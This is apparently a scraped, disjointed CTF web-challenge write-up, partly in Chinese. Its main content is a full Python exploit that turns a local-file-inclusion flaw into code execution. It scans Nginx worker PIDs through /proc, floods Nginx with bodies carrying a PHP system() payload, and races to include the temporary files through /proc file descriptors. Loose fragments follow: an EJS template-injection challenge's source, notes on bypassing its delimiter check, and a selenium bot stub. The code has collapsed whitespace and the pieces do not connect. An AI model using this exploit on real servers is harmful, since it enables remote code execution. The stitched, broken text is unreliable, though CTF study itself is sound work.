If a file was deleted while a process holds an open file descriptor: realpath() will return the last path of the file with “ (deleted)” appended to it. open() will return an fd that can be used to read the original file content.
import requests import threading import multiprocessing import threading import random SERVER = "http://192.168.43.103:49153" NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41]) # Set the following to True to use the above set of PIDs instead of scanning: USE_NGINX_PIDS_CACHE = False #创建会话句柄 defcreate_requests_session(): session = requests.Session() # Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead #自定义HTTP适配器,创建连接池,消除tcp三次握手时延 adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000) session.mount('http://', adapter) return session #获取Nginx主进程pid defget_nginx_pids(requests_session): if USE_NGINX_PIDS_CACHE: return NGINX_PIDS_CACHE nginx_pids = set() # Scan up to PID 200 for i inrange(1, 200): cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text if cmdline.startswith("nginx: worker process"): nginx_pids.add(i) return nginx_pids #向Nginx发送过大Body,使其生成临时文件 defsend_payload(requests_session, body_size=1024000): try: # The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast payload = '<?php system("/readflag");__halt_compiler(); ?>' requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload))))) except: pass #循环发送 defsend_payload_worker(requests_session): whileTrue: send_payload(requests_session) #多线程发送Payload defsend_payload_multiprocess(requests_session): # Use all CPUs to send the payload as request body for Nginx for _ inrange(multiprocessing.cpu_count()): p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,)) p.start() #生成随机路径/proc/pid/cwd/proc/pid/root绕过php软连接stat defgenerate_random_path_prefix(nginx_pids): # This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root path = "" component_num = random.randint(0, 10) for _ inrange(component_num): pid = random.choice(nginx_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path #遍历读fd文件 defread_file(requests_session, nginx_pid, fd, nginx_pids): nginx_pid_list = list(nginx_pids) whileTrue: path = generate_random_path_prefix(nginx_pid_list) path += f"/proc/{nginx_pid}/fd/{fd}" try: d = requests_session.get(SERVER + f"/?action=include&file={path}").text except: continue if"flag"in d: print("Found flag! ") print(d) exit() #多线程竞争临时文件 defread_file_worker(requests_session, nginx_pid, nginx_pids): # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range for fd inrange(10, 45): thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids)) thread.start() #多进程竞争临时文件 defread_file_multiprocess(requests_session, nginx_pids): for nginx_pid in nginx_pids: p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids)) p.start() if __name__ == "__main__": print('[DEBUG] Creating requests session') requests_session = create_requests_session() print('[DEBUG] Getting Nginx pids') nginx_pids = get_nginx_pids(requests_session) print(f'[DEBUG] Nginx pids: {nginx_pids}') print('[DEBUG] Starting payload sending') send_payload_multiprocess(requests_session) print('[DEBUG] Starting fd readers') read_file_multiprocess(requests_session, nginx_pids)
defserver(): print('[+] http server started', file=sys.stderr) server = ThreadingSimpleServer(('0.0.0.0', MY_PORT), Handler) # we only need to handle one response server.handle_request() server.shutdown()
app.post('/template', function(req, res) { let tmpl = req.body.tmpl; let i = -1; while((i = tmpl.indexOf("<%", i+1)) >= 0) { if (tmpl.substring(i, i+11) !== "<%= name %>") { res.status(400).send({message:"Only '<%= name %>' is allowed."}); return; } } let uuid; do { uuid = crypto.randomUUID(); } while (fs.existsSync(`views/${uuid}.ejs`))
try { fs.writeFileSync(`views/${uuid}.ejs`, tmpl); } catch(err) { res.status(500).send("Failed to write Valentine's card"); return; } let name = req.body.name ?? ''; return res.redirect(`/${uuid}?name=${name}`); });
app.get('/:template', function(req, res) { let query = req.query; let template = req.params.template if (!/^[0-9A-F]{8}-[0-9A-F]{4}-[4][0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test(template)) { res.status(400).send("Not a valid card id") return; } if (!fs.existsSync(`views/${template}.ejs`)) { res.status(400).send('Valentine\'s card does not exist') return; } if (!query['name']) { query['name'] = '' } return res.render(template, query); });
审计一下代码可以发现,就是一个可控模板内容的app,我们可以创建自定义内容的ejs模板文件,然后在另一个路由对齐进行渲染,题目中有一个误导: <%= name %>,这一段话很容易让人想歪,让人觉得只能以这段话开头,实际上不是,我们都知道SSTI就是因为模板符号滥用导致的,这就涉及模板分隔符的概念了,在之前的文章里我们讲到了python原型链污染,我们是污染flask的模板分隔符从而达成的rce,这里我们可以查阅一下ejs的官方文档:
from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.chrome.options import Options from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.chrome.service import Service from webdriver_manager.chrome import ChromeDriverManager from webdriver_manager.core.utils import ChromeType import re import sys import os import time from urllib.parse import quote
defget(prompt, regex): inp = input(prompt) ifnot re.match(regex, inp): print(f"Input {inp} does not match regex {regex}", flush=True) exit(1) return inp
# log in base_url = f"http://{quote(PROXY_USERNAME)}:{quote(PROXY_PASSWORD)}@{CHALLENGE_IP}:{PORT}" print(f"Logging in to {base_url}", flush=True) driver.get(base_url)